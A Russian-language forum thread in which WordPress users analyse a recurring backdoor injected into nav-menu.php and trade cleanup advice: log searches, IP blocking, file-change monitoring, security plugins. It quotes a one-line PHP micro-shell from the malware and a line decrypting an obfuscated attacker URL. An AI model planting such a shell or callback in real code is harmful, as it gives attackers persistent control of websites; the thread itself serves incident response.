Сайт на WP постоянно взламывается путём перезаписи /wp-includes/nav-menu.php

Статус
В этой теме нельзя размещать новые ответы.

shake1

Хранитель порядка
Регистрация
16 Янв 2013
Сообщения
534
Реакции
605
После айболита касперский находил левый код, а после касперского cureit еще находил. Так что - качайте сайт себе на машину и проверьте с cureit (утилита от dr.web)
 

SverloFF

Писатель
Регистрация
15 Дек 2015
Сообщения
4
Реакции
2
  • Заблокирован
  • #12
После айболита касперский находил левый код, а после касперского cureit еще находил. Так что - качайте сайт себе на машину и проверьте с cureit (утилита от dr.web)
Айболит вообще фигня, ядро шелла и прочее легко переписать.
Он ищет только по папкам сайта, если заразу спрятать папками выше в ets или tmp - не найдет.
 

mizaider

Создатель
Регистрация
14 Янв 2016
Сообщения
25
Реакции
10
Код:
           671           $url = decrypt_url('a3d3czksLDI3Ny0xMDAtNTotOzAsYW9sZCw8c3ZuYiV2d25ccGx2cWBmPjE3MzQyOTQxMzo2MjkyOzs0');

Ваш сайт взаимодействует с сервером злоумышленника который зашифрован в строке 671
Скрытое содержимое доступно для зарегистрированных пользователей!
 
Последнее редактирование модератором:

latteo

Эффективное использование PHP, MySQL
Регистрация
27 Фев 2008
Сообщения
1.603
Реакции
1.565
Ваш сайт взаимодействует с сервером злоумышленника который зашифрован в строке 671
Скрытое содержимое доступно для зарегистрированных пользователей!
Так и есть, но как красиво это сделано...

Помогите пожалуйста найти причину, как кому-то удаётся постоянно перезаписать nav-menu.php. Установил Firewall и плагин от Sucuri.net, но файл периодически всё равно перезаписывается и туда добавляется вот такой код:

Сам себя данный код не перезаписывает. Но содержит несколько интересных моментов:
- встроенный "антивирус" проверят, что не было измененный файла index.php и .htaccess и, в случае их изменения, перезаписывает с маскировкой даты на нормальные!
- в пользовательскую часть сайта (на все страницы) встраивается дополнительный произвольный html код получаемый с адреса, который опубликовал @mizaider (по возможности прячется от поисковиков)
при этом только на обычные страницы, чтобы не сломать .css .doc и т.д.
- плюс проверка на то что код не удалили... вот тут кстати будет паливо ищите в логах сервера запросы со строкой "062117892ed93da0fade1e74852ed3aa" - узнаете ip сервера хакера и по нему смотрите что еще подозрительного запрашивает.
- ну и конечно микрошелл, который позволит перезалить вирус или залить еще несколько или просто чего-то запустить:
PHP:
if (@$p[$_passssword] AND @$p['a'] AND @$p['c']) @$p[$_passssword](@$p['a'], @$p['c'], '');

А советы по поиску уязвимости стандартные и выше большую часть привели. Дополню, что десктопные антивири очень фигово ищют вирусню такого рода. А тот же Айболит покажет много ложных срабатываний, но зато и почти все шелы или подозрительный код.
 

Hermes_r

Гуру форума
Регистрация
27 Июн 2009
Сообщения
163
Реакции
67
@latteo @mizaider А как запретить любые соединения с адресом злоумышленника? Куда можно написать абузу? Сейчас занимаюсь исследованием логов, по тем рекомендациям, что вы дали. Как я понял невозможно запустить какое-то приложение, которое бы отслеживало все изменения, единственный способ это анализ логов, верно?..
Большое спасибо за анализ скрипта, я уже 3 месяц пытаюсь удалить бэкдор, но он постоянно появляется.

@latteo А в каких логах нужно искать, на сервере хостера есть access_log и error_log и там и там смотрел, но подобной строчки не нашёл. Какого рода ошибка или запись должна быть?..
 
Последнее редактирование модератором:

latteo

Эффективное использование PHP, MySQL
Регистрация
27 Фев 2008
Сообщения
1.603
Реакции
1.565
@latteo А в каких логах нужно искать, на сервере хостера есть access_log и error_log и там и там смотрел, но подобной строчки не нашёл. Какого рода ошибка или запись должна быть?..
Смотрели скорее всего верно, только надо учесть, что логи могут архивироваться...
Возможно так же что хакер не настроил отслеживание и таких запросов действительно нет. Хотя во всех чистках где я принимал участие такое было.

@latteo А как запретить любые соединения с адресом злоумышленника?
Это почти анрил, можно добавлять IP адреса злоумышленника в фаервол вашего хостинга, если у него есть такая услуга или у вас VPS, можно в .htaccess (на форуме уже много тем по этому вопросу)
Но обходится это довольно легко через прокси, причем прокси могут поднимать на зараженных сайтах.

Как я понял невозможно запустить какое-то приложение, которое бы отслеживало все изменения, единственный способ это анализ логов, верно?..
Погуглите md5 проверка изменений, у меня под рукой нет готового алгоритма, а суть в том что стандартными утилитами linux можно отслеживать изменения файлов и оперативно реагировать на вмешательство.
Иногда это идёт как плагин в панели хостера, но видел я такое только у зарубежных хостеров.

Для повышения спокойствия можно попробовать пожить без плагинов (удалить физически) и поставив последнюю версию WP. Но вообще движок мегапопулярен и ломают его часто...
 

Hermes_r

Гуру форума
Регистрация
27 Июн 2009
Сообщения
163
Реакции
67
Смотрели скорее всего верно, только надо учесть, что логи могут архивироваться...
Возможно так же что хакер не настроил отслеживание и таких запросов действительно нет. Хотя во всех чистках где я принимал участие такое было.


Это почти анрил, можно добавлять IP адреса злоумышленника в фаервол вашего хостинга, если у него есть такая услуга или у вас VPS, можно в .htaccess (на форуме уже много тем по этому вопросу)
Но обходится это довольно легко через прокси, причем прокси могут поднимать на зараженных сайтах.


Погуглите md5 проверка изменений, у меня под рукой нет готового алгоритма, а суть в том что стандартными утилитами linux можно отслеживать изменения файлов и оперативно реагировать на вмешательство.
Иногда это идёт как плагин в панели хостера, но видел я такое только у зарубежных хостеров.

Для повышения спокойствия можно попробовать пожить без плагинов (удалить физически) и поставив последнюю версию WP. Но вообще движок мегапопулярен и ломают его часто...
Большое спасибо за идею. Действительно можно собрать хеши всех файлов и далее смотреть, что изменилось и как и в какое время. По поводу вордпреса вы правы. Сейчас как раз смотрю, что из коммерческих вещей более менее может защитить. Смотрю в сторону ninja firewall

Большое спасибо сканер нашел много доров. Удалил их все. Надеюсь этого достаточно.
 
Последнее редактирование модератором:

wpnullorg

Писатель
Регистрация
27 Мар 2016
Сообщения
0
Реакции
6
iThemes Security/Smart Security + WordFence + 5G/6G Firewall в .htaccess и будет вам счастье :)
 

dimases

Создатель
Регистрация
14 Авг 2006
Сообщения
12
Реакции
3
Используйте SerVal Для просмотра ссылки Войди или Зарегистрируйся
Недавно выложили эту систему в свободное скачивание. Как раз и занимается тем, что следит за изменениями файлов.
 

nostr

Создатель
Регистрация
6 Май 2007
Сообщения
10
Реакции
31
Есть ещё такой вариант: AntiShell - Скрипт для контроля за изменениями в файлах на сайте.
ссылка на GitHub: Для просмотра ссылки Войди или Зарегистрируйся
Сам использую до сих пор, не раз выручало, чуть доработал, и смс приходили (сейчас только по емейл), отчет короткий и по существу: какие файлы появились, удалены, изменены

А вот это то, что нужно! Спасибо!
Пожалуйста, если поставишь, то скрипт лучше запрятать глубоко, что-бы снизить вероятность его нахождения, благо, это легко сделать, всего-то 1 файл, и переименовать можно, на крон поставить, к примеру каждый 30-60 мин. тестировать, это полезно не только для быстрой реакции против взлома, но и для сверки логов сервера со временем обнаружения взлома, по нему можно вычислить IP , если не со своей страны, например всякие прокси и прочее, то можно сразу в блеклист брандмауэра внести, в другом случае, если серьезно, заявление провайдеру или в полицию.
 
Последнее редактирование модератором:
Статус
В этой теме нельзя размещать новые ответы.
Сверху